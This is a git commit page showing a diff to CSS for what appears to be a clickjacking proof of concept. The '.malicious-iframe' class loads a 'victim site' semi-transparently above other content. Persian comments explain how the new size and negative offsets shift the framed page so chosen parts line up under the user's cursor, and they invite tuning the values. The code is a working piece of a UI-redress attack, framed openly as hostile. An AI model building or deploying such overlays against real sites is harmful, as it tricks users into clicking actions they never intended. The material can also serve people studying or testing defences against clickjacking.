Add
This commit is contained in:
parent
6ee364abf5
commit
078785e04d
|
|
@ -42,10 +42,15 @@
|
||||||
/* The malicious iframe loading the victim site */
|
/* The malicious iframe loading the victim site */
|
||||||
.malicious-iframe {
|
.malicious-iframe {
|
||||||
position: absolute;
|
position: absolute;
|
||||||
top: -339px;
|
|
||||||
left: 0px;
|
/* ۱. فریم را بسیار بزرگ میکنیم تا کل صفحه قربانی رندر شود و به هم نریزد */
|
||||||
width: 100%;
|
width: 1200px;
|
||||||
height: 100%;
|
height: 1500px;
|
||||||
|
|
||||||
|
/* ۲. با مقادیر منفی، فریم را به بالا و چپ هول میدهیم (مانند یک اسکرول مخفی) */
|
||||||
|
top: -500px; /* این عدد را تغییر دهید تا صفحه به بالا/پایین حرکت کند */
|
||||||
|
left: -100px; /* این عدد را تغییر دهید تا صفحه به چپ/راست حرکت کند */
|
||||||
|
|
||||||
border: none;
|
border: none;
|
||||||
z-index: 2;
|
z-index: 2;
|
||||||
opacity: 0.4;
|
opacity: 0.4;
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user